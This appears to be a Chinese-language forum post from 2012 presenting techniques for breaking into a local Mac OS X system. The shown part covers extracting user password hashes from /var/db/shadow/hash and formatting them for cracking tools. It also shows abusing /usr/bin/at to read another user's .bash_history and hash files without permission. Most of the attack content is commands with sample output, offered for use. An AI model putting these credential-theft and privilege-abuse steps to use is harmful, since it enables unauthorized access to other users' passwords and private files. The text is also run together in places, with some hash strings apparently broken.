入侵本地MacOSX方针与技巧

显示全部楼层 · 2012-4-1 19:22:06

本文从提升权限漏洞的一系列巧妙的方法来绕过受保护的MacOSX。有些已经被处于底层控制，但由于它们存在着更多的认证和修补程序，我们不妨让这些提供出来，以便需要的人学习它们。虽然我不只是要利用脚本，而且之后我将解释可以做哪些事情，让你利用这些技巧能够充分地进行研究。
-破解用户密码

-通过Root读取/usr/bin/at文件

-敏感交换文件

-欺骗软件更新

-恢复开发固件密码

-恶意启动项目的利用

-URL处理程序漏洞利用

-尾声

破解用户密码

~~~~~~~~~~~~~~~~
在过去的日子里你只需执行“nidumppasswd”，并获得所有用户密码加密的一个DES清单。还有几种方法可以恢复用户密码，MacOSX在/etc/shadow或/etc/master密码文件中不存储密码。但是，有一种方法可以恢复所有用户的密码哈希。
MacOSX使用NetInfo处理用户账户。该密码哈希存储在/var/db/shadow/hash/(guid)。每个用户都有自己的哈希文件，要获得一个用户清单及其相应产生的uid(guid)，尝试：

local:user$nireport//usersnamegenerateduiduid|grep-vNoValue

admin559DBF44-4231-11D9-A5A8-00039367EBAE501

orb5D97A400-5045-11D9-AFEB-00039367EBAE502

testC82D45B7-6422-11D9-853D-00039367EBAE503
因此，“admin”用户的密码存储在/var/db/shadow/hash/559DBF44-4231-11D9-A5A8-00039367EBAE.

现在可以作为Root只读这个文件，当然，我们也有一些窍门可以尝试，让你阅读这些文件。但是，首先要说的是你目前已拥有Root权限。

#cat/var/db/shadow/hash/559DBF44-4231-11D9-A5A8

00039367EBAE209C6174DA490CAEB422F3FA5A7AE634F0D412BD764FFE81AAD3B435B5

1404EED033E22AE348AEB5660FC2140AEC35850C4DA997
这个巨长的字符串包含两个相同的密码哈希。第一个64个字符组成的SMB散列（这是Windows使用的文件共享，即使没有打开）这实际上是放在一起的两个32个字符的MD4散列。

最后40个字符组成了SHA1哈希。你一旦恢复这个文件，所有剩下的工作就是正确地格式化这个文件并通过Ripper或Lepton'sCrack进行破解。
SMB哈希:

admin:209C6174DA490CAEB422F3FA5A7AE634:F0D412BD764FFE81AAD3B435B51404EE

orb:6FFB224FB592476B2230862E220937DA:4B881A967FE694FBAAD3B435B51404EE

test:0CB6948805F797BF2A82807973B89537:01FC5A6BE7BC6929AADB435B51404EE
SHA1哈希:

admin:D033E22AE348AEB5660FC2140AEC35850C4DA997

orb:23119F5947DA61A815E7A1CC2AF9BDB8C19CAF1F

test:A94A8FE5CCB19BA61C4C0873D391E987982FBBD3

通过Root读取/usr/bin/at

~~~~~~~~~~~~~~~~~~~~~~~~~~~

这个允许你作为root身份读取/usr/bin/at并分析存在的漏洞。使用这一招，你可以阅读各种敏感文件，包括用户密码哈希、临时交换文件、.bash_history文件等。
这将允许你读取由“admin”用户所执行的命令列表：

local:user$id

uid=503(test)gid=503(test)groups=503(test)

local:user$ls-al/users/admin/.bash_history

-rw-------1adminstaff125912Apr2010/users/admin/.bash_history

local:user$cat/users/admin/.bash_historycat:/users/admin/.bash_history:

Permissiondenied

local:user$at-f/users/admin/.bash_historynow+1minute

czya011afa33.000willbeexecutedusing/bin/sh

local:user$cat/var/at/jobs/a011afa33.000
只要你有权使用本地机器，你可以阅读所有文件的哈希值：

at-f/var/db/shadow/hash/559DBF44-4231-11D9A5A8-00039367EBAEnow+1minute

*